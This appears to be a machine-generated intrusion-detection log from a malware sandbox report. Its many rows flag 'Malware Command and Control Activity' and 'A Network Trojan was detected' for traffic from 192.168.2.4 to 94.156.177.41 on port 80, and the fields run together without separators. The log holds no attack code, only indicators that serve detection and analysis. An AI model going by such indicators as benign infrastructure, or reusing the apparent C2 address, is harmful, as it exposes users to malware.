                    2025-01-07T12:34:00.722379+010020243131Malware Command and Control Activity Detected192.168.2.45013894.156.177.4180TCP
                    2025-01-07T12:34:01.830408+010020243131Malware Command and Control Activity Detected192.168.2.45013994.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:32:03.275190+010020243181Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                    2025-01-07T12:32:04.338995+010020243181Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                    2025-01-07T12:32:05.248744+010020243181Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                    2025-01-07T12:32:07.009365+010020243181Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
                    2025-01-07T12:32:07.935086+010020243181Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                    2025-01-07T12:32:08.818254+010020243181Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
                    2025-01-07T12:32:09.731700+010020243181Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
                    2025-01-07T12:32:10.797050+010020243181Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                    2025-01-07T12:32:11.917927+010020243181Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
                    2025-01-07T12:32:12.853819+010020243181Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
                    2025-01-07T12:32:13.756413+010020243181Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
                    2025-01-07T12:32:14.647155+010020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                    2025-01-07T12:32:15.593522+010020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                    2025-01-07T12:32:16.533683+010020243181Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
                    2025-01-07T12:32:17.445085+010020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                    2025-01-07T12:32:18.365851+010020243181Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
                    2025-01-07T12:32:19.255213+010020243181Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                    2025-01-07T12:32:20.161554+010020243181Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                    2025-01-07T12:32:21.055285+010020243181Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
                    2025-01-07T12:32:21.994686+010020243181Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                    2025-01-07T12:32:22.907710+010020243181Malware Command and Control Activity Detected192.168.2.44976594.156.177.4180TCP
                    2025-01-07T12:32:23.819944+010020243181Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                    2025-01-07T12:32:24.698249+010020243181Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                    2025-01-07T12:32:25.606968+010020243181Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                    2025-01-07T12:32:26.577641+010020243181Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                    2025-01-07T12:32:27.430547+010020243181Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                    2025-01-07T12:32:28.316402+010020243181Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                    2025-01-07T12:32:29.349357+010020243181Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                    2025-01-07T12:32:30.221935+010020243181Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                    2025-01-07T12:32:31.091089+010020243181Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                    2025-01-07T12:32:31.988683+010020243181Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                    2025-01-07T12:32:32.891493+010020243181Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                    2025-01-07T12:32:33.772124+010020243181Malware Command and Control Activity Detected192.168.2.44977794.156.177.4180TCP
                    2025-01-07T12:32:34.665544+010020243181Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                    2025-01-07T12:32:35.557501+010020243181Malware Command and Control Activity Detected192.168.2.44977994.156.177.4180TCP
                    2025-01-07T12:32:36.434903+010020243181Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                    2025-01-07T12:32:37.324672+010020243181Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
                    2025-01-07T12:32:38.192729+010020243181Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
                    2025-01-07T12:32:39.104383+010020243181Malware Command and Control Activity Detected192.168.2.44978394.156.177.4180TCP
                    2025-01-07T12:32:39.957327+010020243181Malware Command and Control Activity Detected192.168.2.44978494.156.177.4180TCP
                    2025-01-07T12:32:40.840674+010020243181Malware Command and Control Activity Detected192.168.2.44978594.156.177.4180TCP
                    2025-01-07T12:32:41.705575+010020243181Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                    2025-01-07T12:32:42.591000+010020243181Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
                    2025-01-07T12:32:43.480919+010020243181Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
                    2025-01-07T12:32:44.368376+010020243181Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
                    2025-01-07T12:32:45.260532+010020243181Malware Command and Control Activity Detected192.168.2.44979094.156.177.4180TCP
                    2025-01-07T12:32:46.120173+010020243181Malware Command and Control Activity Detected192.168.2.44979194.156.177.4180TCP
                    2025-01-07T12:32:47.026386+010020243181Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                    2025-01-07T12:32:47.914990+010020243181Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                    2025-01-07T12:32:48.821374+010020243181Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
                    2025-01-07T12:32:49.713193+010020243181Malware Command and Control Activity Detected192.168.2.44979594.156.177.4180TCP
                    2025-01-07T12:32:50.609302+010020243181Malware Command and Control Activity Detected192.168.2.44979694.156.177.4180TCP
                    2025-01-07T12:32:51.495138+010020243181Malware Command and Control Activity Detected192.168.2.44979894.156.177.4180TCP
                    2025-01-07T12:32:52.422354+010020243181Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                    2025-01-07T12:32:53.323679+010020243181Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
                    2025-01-07T12:32:54.426552+010020243181Malware Command and Control Activity Detected192.168.2.44980194.156.177.4180TCP
                    2025-01-07T12:32:55.294818+010020243181Malware Command and Control Activity Detected192.168.2.44980394.156.177.4180TCP
                    2025-01-07T12:32:56.184948+010020243181Malware Command and Control Activity Detected192.168.2.44980494.156.177.4180TCP
                    2025-01-07T12:32:57.071831+010020243181Malware Command and Control Activity Detected192.168.2.44981094.156.177.4180TCP
                    2025-01-07T12:32:57.962291+010020243181Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                    2025-01-07T12:32:58.853828+010020243181Malware Command and Control Activity Detected192.168.2.44982294.156.177.4180TCP
                    2025-01-07T12:32:59.720354+010020243181Malware Command and Control Activity Detected192.168.2.44982894.156.177.4180TCP
                    2025-01-07T12:33:00.607397+010020243181Malware Command and Control Activity Detected192.168.2.44983794.156.177.4180TCP
                    2025-01-07T12:33:01.490314+010020243181Malware Command and Control Activity Detected192.168.2.44984394.156.177.4180TCP
                    2025-01-07T12:33:02.396007+010020243181Malware Command and Control Activity Detected192.168.2.44984994.156.177.4180TCP
                    2025-01-07T12:33:03.285971+010020243181Malware Command and Control Activity Detected192.168.2.44985794.156.177.4180TCP
                    2025-01-07T12:33:04.228379+010020243181Malware Command and Control Activity Detected192.168.2.44986394.156.177.4180TCP
                    2025-01-07T12:33:05.135088+010020243181Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
                    2025-01-07T12:33:06.011427+010020243181Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                    2025-01-07T12:33:06.894211+010020243181Malware Command and Control Activity Detected192.168.2.44988294.156.177.4180TCP
                    2025-01-07T12:33:07.922188+010020243181Malware Command and Control Activity Detected192.168.2.44988894.156.177.4180TCP
                    2025-01-07T12:33:08.808854+010020243181Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
                    2025-01-07T12:33:09.719346+010020243181Malware Command and Control Activity Detected192.168.2.44990494.156.177.4180TCP
                    2025-01-07T12:33:10.771269+010020243181Malware Command and Control Activity Detected192.168.2.44991094.156.177.4180TCP
                    2025-01-07T12:33:11.659311+010020243181Malware Command and Control Activity Detected192.168.2.44991894.156.177.4180TCP
                    2025-01-07T12:33:12.593371+010020243181Malware Command and Control Activity Detected192.168.2.44992794.156.177.4180TCP
                    2025-01-07T12:33:13.817700+010020243181Malware Command and Control Activity Detected192.168.2.44993394.156.177.4180TCP
                    2025-01-07T12:33:14.698696+010020243181Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                    2025-01-07T12:33:15.583031+010020243181Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                    2025-01-07T12:33:16.529723+010020243181Malware Command and Control Activity Detected192.168.2.44995694.156.177.4180TCP
                    2025-01-07T12:33:17.415506+010020243181Malware Command and Control Activity Detected192.168.2.44996294.156.177.4180TCP
                    2025-01-07T12:33:18.317821+010020243181Malware Command and Control Activity Detected192.168.2.44996894.156.177.4180TCP
                    2025-01-07T12:33:19.383367+010020243181Malware Command and Control Activity Detected192.168.2.44997494.156.177.4180TCP
                    2025-01-07T12:33:20.262019+010020243181Malware Command and Control Activity Detected192.168.2.44998594.156.177.4180TCP
                    2025-01-07T12:33:21.160919+010020243181Malware Command and Control Activity Detected192.168.2.44999194.156.177.4180TCP
                    2025-01-07T12:33:22.097407+010020243181Malware Command and Control Activity Detected192.168.2.44999794.156.177.4180TCP
                    2025-01-07T12:33:22.988429+010020243181Malware Command and Control Activity Detected192.168.2.45000394.156.177.4180TCP
                    2025-01-07T12:33:23.905645+010020243181Malware Command and Control Activity Detected192.168.2.45001094.156.177.4180TCP
                    2025-01-07T12:33:24.785850+010020243181Malware Command and Control Activity Detected192.168.2.45001994.156.177.4180TCP
                    2025-01-07T12:33:25.726265+010020243181Malware Command and Control Activity Detected192.168.2.45002694.156.177.4180TCP
                    2025-01-07T12:33:26.611215+010020243181Malware Command and Control Activity Detected192.168.2.45003294.156.177.4180TCP
                    2025-01-07T12:33:27.495067+010020243181Malware Command and Control Activity Detected192.168.2.45003894.156.177.4180TCP
                    2025-01-07T12:33:28.406726+010020243181Malware Command and Control Activity Detected192.168.2.45004594.156.177.4180TCP
                    2025-01-07T12:33:29.321667+010020243181Malware Command and Control Activity Detected192.168.2.45005494.156.177.4180TCP
                    2025-01-07T12:33:30.200229+010020243181Malware Command and Control Activity Detected192.168.2.45006094.156.177.4180TCP
                    2025-01-07T12:33:31.133820+010020243181Malware Command and Control Activity Detected192.168.2.45006794.156.177.4180TCP
                    2025-01-07T12:33:32.021373+010020243181Malware Command and Control Activity Detected192.168.2.45007394.156.177.4180TCP
                    2025-01-07T12:33:32.920405+010020243181Malware Command and Control Activity Detected192.168.2.45007994.156.177.4180TCP
                    2025-01-07T12:33:33.838131+010020243181Malware Command and Control Activity Detected192.168.2.45008694.156.177.4180TCP
                    2025-01-07T12:33:34.750375+010020243181Malware Command and Control Activity Detected192.168.2.45009494.156.177.4180TCP
                    2025-01-07T12:33:35.663277+010020243181Malware Command and Control Activity Detected192.168.2.45010094.156.177.4180TCP
                    2025-01-07T12:33:36.542571+010020243181Malware Command and Control Activity Detected192.168.2.45010694.156.177.4180TCP
                    2025-01-07T12:33:37.462301+010020243181Malware Command and Control Activity Detected192.168.2.45011294.156.177.4180TCP
                    2025-01-07T12:33:38.351026+010020243181Malware Command and Control Activity Detected192.168.2.45011494.156.177.4180TCP
                    2025-01-07T12:33:39.277673+010020243181Malware Command and Control Activity Detected192.168.2.45011594.156.177.4180TCP
                    2025-01-07T12:33:40.149202+010020243181Malware Command and Control Activity Detected192.168.2.45011694.156.177.4180TCP
                    2025-01-07T12:33:41.026481+010020243181Malware Command and Control Activity Detected192.168.2.45011794.156.177.4180TCP
                    2025-01-07T12:33:42.069136+010020243181Malware Command and Control Activity Detected192.168.2.45011894.156.177.4180TCP
                    2025-01-07T12:33:42.943866+010020243181Malware Command and Control Activity Detected192.168.2.45011994.156.177.4180TCP
                    2025-01-07T12:33:43.909799+010020243181Malware Command and Control Activity Detected192.168.2.45012094.156.177.4180TCP
                    2025-01-07T12:33:44.821678+010020243181Malware Command and Control Activity Detected192.168.2.45012194.156.177.4180TCP
                    2025-01-07T12:33:45.694009+010020243181Malware Command and Control Activity Detected192.168.2.45012294.156.177.4180TCP
                    2025-01-07T12:33:46.585711+010020243181Malware Command and Control Activity Detected192.168.2.45012394.156.177.4180TCP
                    2025-01-07T12:33:47.641378+010020243181Malware Command and Control Activity Detected192.168.2.45012494.156.177.4180TCP
                    2025-01-07T12:33:48.495517+010020243181Malware Command and Control Activity Detected192.168.2.45012594.156.177.4180TCP
                    2025-01-07T12:33:49.400961+010020243181Malware Command and Control Activity Detected192.168.2.45012694.156.177.4180TCP
                    2025-01-07T12:33:50.308279+010020243181Malware Command and Control Activity Detected192.168.2.45012794.156.177.4180TCP
                    2025-01-07T12:33:51.192040+010020243181Malware Command and Control Activity Detected192.168.2.45012894.156.177.4180TCP
                    2025-01-07T12:33:52.077623+010020243181Malware Command and Control Activity Detected192.168.2.45012994.156.177.4180TCP
                    2025-01-07T12:33:53.256311+010020243181Malware Command and Control Activity Detected192.168.2.45013094.156.177.4180TCP
                    2025-01-07T12:33:54.360403+010020243181Malware Command and Control Activity Detected192.168.2.45013194.156.177.4180TCP
                    2025-01-07T12:33:55.263205+010020243181Malware Command and Control Activity Detected192.168.2.45013294.156.177.4180TCP
                    2025-01-07T12:33:56.154405+010020243181Malware Command and Control Activity Detected192.168.2.45013394.156.177.4180TCP
                    2025-01-07T12:33:57.175145+010020243181Malware Command and Control Activity Detected192.168.2.45013494.156.177.4180TCP
                    2025-01-07T12:33:58.088991+010020243181Malware Command and Control Activity Detected192.168.2.45013594.156.177.4180TCP
                    2025-01-07T12:33:58.979379+010020243181Malware Command and Control Activity Detected192.168.2.45013694.156.177.4180TCP
                    2025-01-07T12:33:59.832529+010020243181Malware Command and Control Activity Detected192.168.2.45013794.156.177.4180TCP
                    2025-01-07T12:34:00.722379+010020243181Malware Command and Control Activity Detected192.168.2.45013894.156.177.4180TCP
                    2025-01-07T12:34:01.830408+010020243181Malware Command and Control Activity Detected192.168.2.45013994.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:32:00.796955+010020216411A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
                    2025-01-07T12:32:01.754699+010020216411A Network Trojan was detected192.168.2.44973794.156.177.4180TCP
                    2025-01-07T12:32:02.549908+010020216411A Network Trojan was detected192.168.2.44973994.156.177.4180TCP
                    2025-01-07T12:32:03.602114+010020216411A Network Trojan was detected192.168.2.44974094.156.177.4180TCP
                    2025-01-07T12:32:04.490438+010020216411A Network Trojan was detected192.168.2.44974194.156.177.4180TCP
                    2025-01-07T12:32:05.412187+010020216411A Network Trojan was detected192.168.2.44974294.156.177.4180TCP
                    2025-01-07T12:32:07.187246+010020216411A Network Trojan was detected192.168.2.44974394.156.177.4180TCP
                    2025-01-07T12:32:08.083804+010020216411A Network Trojan was detected192.168.2.44974494.156.177.4180TCP
                    2025-01-07T12:32:08.974835+010020216411A Network Trojan was detected192.168.2.44974594.156.177.4180TCP
                    2025-01-07T12:32:10.073415+010020216411A Network Trojan was detected192.168.2.44974694.156.177.4180TCP
                    2025-01-07T12:32:11.223373+010020216411A Network Trojan was detected192.168.2.44974794.156.177.4180TCP
                    2025-01-07T12:32:12.117368+010020216411A Network Trojan was detected192.168.2.44974994.156.177.4180TCP
                    2025-01-07T12:32:13.004316+010020216411A Network Trojan was detected192.168.2.44975194.156.177.4180TCP
                    2025-01-07T12:32:13.932697+010020216411A Network Trojan was detected192.168.2.44975494.156.177.4180TCP
                    2025-01-07T12:32:14.805465+010020216411A Network Trojan was detected192.168.2.44975694.156.177.4180TCP
                    2025-01-07T12:32:15.769592+010020216411A Network Trojan was detected192.168.2.44975894.156.177.4180TCP
                    2025-01-07T12:32:16.694494+010020216411A Network Trojan was detected192.168.2.44975994.156.177.4180TCP
                    2025-01-07T12:32:17.621099+010020216411A Network Trojan was detected192.168.2.44976094.156.177.4180TCP
                    2025-01-07T12:32:18.524599+010020216411A Network Trojan was detected192.168.2.44976194.156.177.4180TCP
                    2025-01-07T12:32:19.413561+010020216411A Network Trojan was detected192.168.2.44976294.156.177.4180TCP
                    2025-01-07T12:32:20.319720+010020216411A Network Trojan was detected192.168.2.44976394.156.177.4180TCP
                    2025-01-07T12:32:21.208840+010020216411A Network Trojan was detected192.168.2.44976494.156.177.4180TCP
                    2025-01-07T12:32:22.190721+010020216411A Network Trojan was detected192.168.2.44976594.156.177.4180TCP
                    2025-01-07T12:32:23.083462+010020216411A Network Trojan was detected192.168.2.44976694.156.177.4180TCP
                    2025-01-07T12:32:23.973870+010020216411A Network Trojan was detected192.168.2.44976794.156.177.4180TCP
                    2025-01-07T12:32:24.880636+010020216411A Network Trojan was detected192.168.2.44976894.156.177.4180TCP
                    2025-01-07T12:32:25.829746+010020216411A Network Trojan was detected192.168.2.44976994.156.177.4180TCP
                    2025-01-07T12:32:26.723358+010020216411A Network Trojan was detected192.168.2.44977094.156.177.4180TCP
                    2025-01-07T12:32:27.582510+010020216411A Network Trojan was detected192.168.2.44977194.156.177.4180TCP
                    2025-01-07T12:32:28.619054+010020216411A Network Trojan was detected192.168.2.44977294.156.177.4180TCP
                    2025-01-07T12:32:29.504390+010020216411A Network Trojan was detected192.168.2.44977394.156.177.4180TCP
                    2025-01-07T12:32:30.382420+010020216411A Network Trojan was detected192.168.2.44977494.156.177.4180TCP
                    2025-01-07T12:32:31.256603+010020216411A Network Trojan was detected192.168.2.44977594.156.177.4180TCP
                    2025-01-07T12:32:32.155614+010020216411A Network Trojan was detected192.168.2.44977694.156.177.4180TCP
                    2025-01-07T12:32:33.032901+010020216411A Network Trojan was detected192.168.2.44977794.156.177.4180TCP
                    2025-01-07T12:32:33.924411+010020216411A Network Trojan was detected192.168.2.44977894.156.177.4180TCP
                    2025-01-07T12:32:34.814297+010020216411A Network Trojan was detected192.168.2.44977994.156.177.4180TCP
                    2025-01-07T12:32:35.704114+010020216411A Network Trojan was detected192.168.2.44978094.156.177.4180TCP
                    2025-01-07T12:32:36.588546+010020216411A Network Trojan was detected192.168.2.44978194.156.177.4180TCP
                    2025-01-07T12:32:37.473584+010020216411A Network Trojan was detected192.168.2.44978294.156.177.4180TCP
                    2025-01-07T12:32:38.360546+010020216411A Network Trojan was detected192.168.2.44978394.156.177.4180TCP
                    2025-01-07T12:32:39.253004+010020216411A Network Trojan was detected192.168.2.44978494.156.177.4180TCP
                    2025-01-07T12:32:40.116039+010020216411A Network Trojan was detected192.168.2.44978594.156.177.4180TCP
                    2025-01-07T12:32:40.987508+010020216411A Network Trojan was detected192.168.2.44978694.156.177.4180TCP
                    2025-01-07T12:32:41.861754+010020216411A Network Trojan was detected192.168.2.44978794.156.177.4180TCP
                    2025-01-07T12:32:42.736881+010020216411A Network Trojan was detected192.168.2.44978894.156.177.4180TCP
                    2025-01-07T12:32:43.630025+010020216411A Network Trojan was detected192.168.2.44978994.156.177.4180TCP
                    2025-01-07T12:32:44.529692+010020216411A Network Trojan was detected192.168.2.44979094.156.177.4180TCP
                    2025-01-07T12:32:45.411818+010020216411A Network Trojan was detected192.168.2.44979194.156.177.4180TCP
                    2025-01-07T12:32:46.293457+010020216411A Network Trojan was detected192.168.2.44979294.156.177.4180TCP
                    2025-01-07T12:32:47.179130+010020216411A Network Trojan was detected192.168.2.44979394.156.177.4180TCP
                    2025-01-07T12:32:48.074620+010020216411A Network Trojan was detected192.168.2.44979494.156.177.4180TCP
                    2025-01-07T12:32:48.984690+010020216411A Network Trojan was detected192.168.2.44979594.156.177.4180TCP
                    2025-01-07T12:32:49.862472+010020216411A Network Trojan was detected192.168.2.44979694.156.177.4180TCP
                    2025-01-07T12:32:50.758629+010020216411A Network Trojan was detected192.168.2.44979894.156.177.4180TCP
                    2025-01-07T12:32:51.655150+010020216411A Network Trojan was detected192.168.2.44979994.156.177.4180TCP
                    2025-01-07T12:32:52.567085+010020216411A Network Trojan was detected192.168.2.44980094.156.177.4180TCP
                    2025-01-07T12:32:53.479625+010020216411A Network Trojan was detected192.168.2.44980194.156.177.4180TCP
                    2025-01-07T12:32:54.584481+010020216411A Network Trojan was detected192.168.2.44980394.156.177.4180TCP
                    2025-01-07T12:32:55.446641+010020216411A Network Trojan was detected192.168.2.44980494.156.177.4180TCP
                    2025-01-07T12:32:56.333834+010020216411A Network Trojan was detected192.168.2.44981094.156.177.4180TCP
                    2025-01-07T12:32:57.237309+010020216411A Network Trojan was detected192.168.2.44981694.156.177.4180TCP
                    2025-01-07T12:32:58.121179+010020216411A Network Trojan was detected192.168.2.44982294.156.177.4180TCP
                    2025-01-07T12:32:59.003527+010020216411A Network Trojan was detected192.168.2.44982894.156.177.4180TCP
                    2025-01-07T12:32:59.878899+010020216411A Network Trojan was detected192.168.2.44983794.156.177.4180TCP
                    2025-01-07T12:33:00.752916+010020216411A Network Trojan was detected192.168.2.44984394.156.177.4180TCP
                    2025-01-07T12:33:01.662274+010020216411A Network Trojan was detected192.168.2.44984994.156.177.4180TCP
                    2025-01-07T12:33:02.549471+010020216411A Network Trojan was detected192.168.2.44985794.156.177.4180TCP
                    2025-01-07T12:33:03.476176+010020216411A Network Trojan was detected192.168.2.44986394.156.177.4180TCP
                    2025-01-07T12:33:04.420628+010020216411A Network Trojan was detected192.168.2.44986994.156.177.4180TCP
                    2025-01-07T12:33:05.289917+010020216411A Network Trojan was detected192.168.2.44987594.156.177.4180TCP
                    2025-01-07T12:33:06.157706+010020216411A Network Trojan was detected192.168.2.44988294.156.177.4180TCP
                    2025-01-07T12:33:07.168337+010020216411A Network Trojan was detected192.168.2.44988894.156.177.4180TCP
                    2025-01-07T12:33:08.065316+010020216411A Network Trojan was detected192.168.2.44989894.156.177.4180TCP
                    2025-01-07T12:33:08.983613+010020216411A Network Trojan was detected192.168.2.44990494.156.177.4180TCP
                    2025-01-07T12:33:10.036766+010020216411A Network Trojan was detected192.168.2.44991094.156.177.4180TCP
                    2025-01-07T12:33:10.925247+010020216411A Network Trojan was detected192.168.2.44991894.156.177.4180TCP
                    2025-01-07T12:33:11.841098+010020216411A Network Trojan was detected192.168.2.44992794.156.177.4180TCP
                    2025-01-07T12:33:12.953872+010020216411A Network Trojan was detected192.168.2.44993394.156.177.4180TCP
                    2025-01-07T12:33:13.973579+010020216411A Network Trojan was detected192.168.2.44994194.156.177.4180TCP
                    2025-01-07T12:33:14.849018+010020216411A Network Trojan was detected192.168.2.44995094.156.177.4180TCP
                    2025-01-07T12:33:15.804831+010020216411A Network Trojan was detected192.168.2.44995694.156.177.4180TCP
                    2025-01-07T12:33:16.682925+010020216411A Network Trojan was detected192.168.2.44996294.156.177.4180TCP
                    2025-01-07T12:33:17.566164+010020216411A Network Trojan was detected192.168.2.44996894.156.177.4180TCP
                    2025-01-07T12:33:18.615544+010020216411A Network Trojan was detected192.168.2.44997494.156.177.4180TCP
                    2025-01-07T12:33:19.538604+010020216411A Network Trojan was detected192.168.2.44998594.156.177.4180TCP
                    2025-01-07T12:33:20.414906+010020216411A Network Trojan was detected192.168.2.44999194.156.177.4180TCP
                    2025-01-07T12:33:21.330905+010020216411A Network Trojan was detected192.168.2.44999794.156.177.4180TCP
                    2025-01-07T12:33:22.254058+010020216411A Network Trojan was detected192.168.2.45000394.156.177.4180TCP
                    2025-01-07T12:33:23.161672+010020216411A Network Trojan was detected192.168.2.45001094.156.177.4180TCP
                    2025-01-07T12:33:24.052352+010020216411A Network Trojan was detected192.168.2.45001994.156.177.4180TCP
                    2025-01-07T12:33:24.970591+010020216411A Network Trojan was detected192.168.2.45002694.156.177.4180TCP
                    2025-01-07T12:33:25.885204+010020216411A Network Trojan was detected192.168.2.45003294.156.177.4180TCP
                    2025-01-07T12:33:26.771343+010020216411A Network Trojan was detected192.168.2.45003894.156.177.4180TCP
                    2025-01-07T12:33:27.680964+010020216411A Network Trojan was detected192.168.2.45004594.156.177.4180TCP
                    2025-01-07T12:33:28.568840+010020216411A Network Trojan was detected192.168.2.45005494.156.177.4180TCP
                    2025-01-07T12:33:29.482591+010020216411A Network Trojan was detected192.168.2.45006094.156.177.4180TCP
                    2025-01-07T12:33:30.418199+010020216411A Network Trojan was detected192.168.2.45006794.156.177.4180TCP
                    2025-01-07T12:33:31.283218+010020216411A Network Trojan was detected192.168.2.45007394.156.177.4180TCP
                    2025-01-07T12:33:32.183439+010020216411A Network Trojan was detected192.168.2.45007994.156.177.4180TCP
                    2025-01-07T12:33:33.064766+010020216411A Network Trojan was detected192.168.2.45008694.156.177.4180TCP
                    2025-01-07T12:33:33.993234+010020216411A Network Trojan was detected192.168.2.45009494.156.177.4180TCP
                    2025-01-07T12:33:34.894254+010020216411A Network Trojan was detected192.168.2.45010094.156.177.4180TCP
                    2025-01-07T12:33:35.815203+010020216411A Network Trojan was detected192.168.2.45010694.156.177.4180TCP
                    2025-01-07T12:33:36.704614+010020216411A Network Trojan was detected192.168.2.45011294.156.177.4180TCP
                    2025-01-07T12:33:37.618568+010020216411A Network Trojan was detected192.168.2.45011494.156.177.4180TCP
                    2025-01-07T12:33:38.510581+010020216411A Network Trojan was detected192.168.2.45011594.156.177.4180TCP
                    2025-01-07T12:33:39.427169+010020216411A Network Trojan was detected192.168.2.45011694.156.177.4180TCP
                    2025-01-07T12:33:40.300156+010020216411A Network Trojan was detected192.168.2.45011794.156.177.4180TCP
                    2025-01-07T12:33:41.178680+010020216411A Network Trojan was detected192.168.2.45011894.156.177.4180TCP
                    2025-01-07T12:33:42.221421+010020216411A Network Trojan was detected192.168.2.45011994.156.177.4180TCP
                    2025-01-07T12:33:43.104720+010020216411A Network Trojan was detected192.168.2.45012094.156.177.4180TCP
                    2025-01-07T12:33:44.073014+010020216411A Network Trojan was detected192.168.2.45012194.156.177.4180TCP
                    2025-01-07T12:33:44.978438+010020216411A Network Trojan was detected192.168.2.45012294.156.177.4180TCP
                    2025-01-07T12:33:45.848723+010020216411A Network Trojan was detected192.168.2.45012394.156.177.4180TCP
                    2025-01-07T12:33:46.736292+010020216411A Network Trojan was detected192.168.2.45012494.156.177.4180TCP
                    2025-01-07T12:33:47.784973+010020216411A Network Trojan was detected192.168.2.45012594.156.177.4180TCP
                    2025-01-07T12:33:48.642095+010020216411A Network Trojan was detected192.168.2.45012694.156.177.4180TCP
                    2025-01-07T12:33:49.553437+010020216411A Network Trojan was detected192.168.2.45012794.156.177.4180TCP
                    2025-01-07T12:33:50.465759+010020216411A Network Trojan was detected192.168.2.45012894.156.177.4180TCP
                    2025-01-07T12:33:51.347194+010020216411A Network Trojan was detected192.168.2.45012994.156.177.4180TCP
                    2025-01-07T12:33:52.222675+010020216411A Network Trojan was detected192.168.2.45013094.156.177.4180TCP
                    2025-01-07T12:33:53.621252+010020216411A Network Trojan was detected192.168.2.45013194.156.177.4180TCP
                    2025-01-07T12:33:54.519173+010020216411A Network Trojan was detected192.168.2.45013294.156.177.4180TCP
                    2025-01-07T12:33:55.412870+010020216411A Network Trojan was detected192.168.2.45013394.156.177.4180TCP
                    2025-01-07T12:33:56.462921+010020216411A Network Trojan was detected192.168.2.45013494.156.177.4180TCP
                    2025-01-07T12:33:57.340598+010020216411A Network Trojan was detected192.168.2.45013594.156.177.4180TCP
                    2025-01-07T12:33:58.239632+010020216411A Network Trojan was detected192.168.2.45013694.156.177.4180TCP
                    2025-01-07T12:33:59.128389+010020216411A Network Trojan was detected192.168.2.45013794.156.177.4180TCP
                    2025-01-07T12:33:59.979403+010020216411A Network Trojan was detected192.168.2.45013894.156.177.4180TCP
                    2025-01-07T12:34:01.024157+010020216411A Network Trojan was detected192.168.2.45013994.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:32:00.796955+010028257661Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
                    2025-01-07T12:32:01.754699+010028257661Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
                    2025-01-07T12:32:02.549908+010028257661Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                    2025-01-07T12:32:03.602114+010028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                    2025-01-07T12:32:04.490438+010028257661Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                    2025-01-07T12:32:05.412187+010028257661Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
                    2025-01-07T12:32:07.187246+010028257661Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                    2025-01-07T12:32:08.083804+010028257661Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
                    2025-01-07T12:32:08.974835+010028257661Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
                    2025-01-07T12:32:10.073415+010028257661Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                    2025-01-07T12:32:11.223373+010028257661Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
                    2025-01-07T12:32:12.117368+010028257661Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
                    2025-01-07T12:32:13.004316+010028257661Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
